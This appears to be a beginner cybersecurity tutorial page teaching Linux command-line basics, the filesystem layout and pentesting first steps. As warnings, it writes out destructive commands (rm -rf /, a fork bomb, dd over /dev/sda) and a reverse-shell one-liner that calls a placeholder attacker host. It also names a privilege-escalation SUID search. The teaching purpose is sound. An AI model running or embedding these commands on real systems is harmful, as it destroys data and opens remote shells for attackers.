The command line is the hacker's best friend. Master essential Linux commands — ls, cd, cat, mkdir, and more — in this hands-on simulated terminal.
In cybersecurity, the command-line interface (CLI) is your primary workspace. While graphical interfaces look pretty, they limit what you can do. The terminal gives you speed, precision, scripting ability, and access to tools that have no GUI. Whether you're pentesting, analyzing logs, hardening servers, or automating tasks — the terminal is where the real work happens.
Think about it: most servers (especially Linux) don't even have a desktop
environment installed. When you SSH into a remote server, you get a terminal — that's it. Every
cybersecurity tool you'll use professionally (Nmap, Burp Suite's CLI, Metasploit, Wireshark's tshark) works from the command line.
The most common shell on Linux is Bash (Bourne
Again SHell), though you'll also encounter zsh, fish, and sh. On most modern
systems, the default is Bash or Zsh.
cd) or an external
program (/usr/bin/ls).ls /home, /home is the argument.ls -la, -l (long format) and -a (show hidden) are flags.Every Linux command follows this general structure:
ls
-la
-l = long, -a = all)/home/user
Tip: Short flags use a single dash (-l), long flags use double dashes (--long-format). Short flags can be combined: -la = -l -a.
These are the commands you'll use every single day. Master them, and you'll navigate any Linux system with confidence:
pwd (Print Working Directory)
Shows the full path of your current location. Always use this
when you're lost. Output: /home/user/documents
ls (List)
Lists files and directories. Add -l for details (permissions, size, date), -a for hidden files (starting with .), -h for human-readable sizes.
cd <dir> (Change Directory)
cd /etc — go to /etc. cd .. — go up one level. cd ~ — go
home. cd - — go to previous directory.
cat <file> (Concatenate)
Displays the entire contents of a file. For large files, use
less (scrollable) or head -n 20
(first 20 lines).
mkdir <name> (Make Directory)
Creates a new directory. Use -p to create nested directories: mkdir -p project/src/utils
touch <file>
Creates an empty file. If the file exists, it updates the modification timestamp. Often used to create placeholder files.
echo <text>
Prints text to the terminal. Combined with redirection: echo "hello" > file.txt writes to a file.
whoami
Shows the current username. Critical in security: knowing if
you're root or a regular user determines what you
can do.
id
Shows user ID (uid), group ID (gid), and all groups. uid=0 means root!
man <cmd> (Manual)
Opens the manual page for any command. Press q to quit. Example: man ls shows all
ls options.
grep <pattern> <file>
Searches for text patterns in files. grep -i "error" /var/log/syslog — case-insensitive search for
"error" in syslog.
find <path> -name <pattern>
Searches for files. find / -name "*.conf" -type f — find all .conf files on the system.
Everything in Linux is a file — even hardware devices, network interfaces, and
running processes. The filesystem is organized in a tree structure starting from the root (/). Here are the most important directories:
/ (Root)
The top-level directory. Everything exists under /. Don't confuse with /root (root user's home).
/home
User home directories. Each user gets /home/username. Your personal files, configs, and SSH keys
live here.
/etc
System configuration files. Passwords (/etc/passwd, /etc/shadow), network config, service configs all live
here.
/var/log
System and application log files. syslog, auth.log
(login attempts), apache2/ — goldmine for forensics.
/bin & /usr/bin
Essential command binaries (ls, cat, grep, etc.). On modern systems, /bin is often a symlink to /usr/bin.
/tmp
Temporary files. World-writable — any user can read/write here. Attackers often store payloads and scripts here.
/root
The root (superuser) home directory. Not the same as /. Only accessible by root.
/dev
Device files. Hard drives (/dev/sda), null device (/dev/null), random (/dev/urandom).
During a penetration test, the first thing you do after gaining shell
access is run whoami, id, and uname -a to understand your privileges and the system. Then
you explore: cat /etc/passwd (user accounts), ls -la /tmp (look for dropped tools), cat /var/log/auth.log (see login attempts). Knowing these
commands instinctively is what separates a beginner from a professional.
Most commands accept flags that modify their behavior. Learning common flags will make you 10x more efficient:
grep (Global Regular Expression
Print) searches for text patterns inside files. It's one of the most-used tools in log analysis,
forensics, and CTF challenges.
find searches for files and
directories based on name, type, size, permissions, and more. Essential for security auditing.
⚠️ Security: find / -perm -4000 is one of the first commands run during Linux
privilege escalation — it finds binaries with the SUID bit that could be exploited to gain root
access.
The real power of the Linux CLI comes from piping (|) —
chaining commands together so the output of one becomes the input of the next. This lets you build
complex data processing pipelines from simple commands.
Environment variables are key-value pairs that configure the shell and programs.
They control everything from which programs you can run (PATH) to your home directory (HOME).
printenv and /proc/[pid]/environ can
expose them. Use proper secret management (Vault, AWS Secrets Manager).
~/.bash_history stores
every command you've typed — including any passwords accidentally entered in plaintext
(e.g., mysql -u root -p'secret123'). On shared systems,
always run history -c and clear the history file. Prefix
commands with a space ( mysql ...) to prevent them from being
recorded (requires HISTCONTROL=ignorespace).
rm -rf / — Deletes the
entire filesystem (modern systems block this without --no-preserve-root). :(){ :|:& };: — A fork bomb that creates
processes recursively until the system runs out of memory and crashes. dd if=/dev/zero of=/dev/sda — Overwrites the entire disk with
zeros. Always verify commands before running, especially with sudo.
Attackers frequently use one-liners like bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 to establish a
reverse shell — a connection from the victim's machine back to the attacker. If you find
this in /tmp, cron, or running
processes, the system is compromised.
A simulated Linux filesystem. Type commands to explore. Complete the challenges below!
whoami)/home/user/documentssecret.txthackedAll certification names are referenced for educational purposes only. This project is not affiliated with any certification body.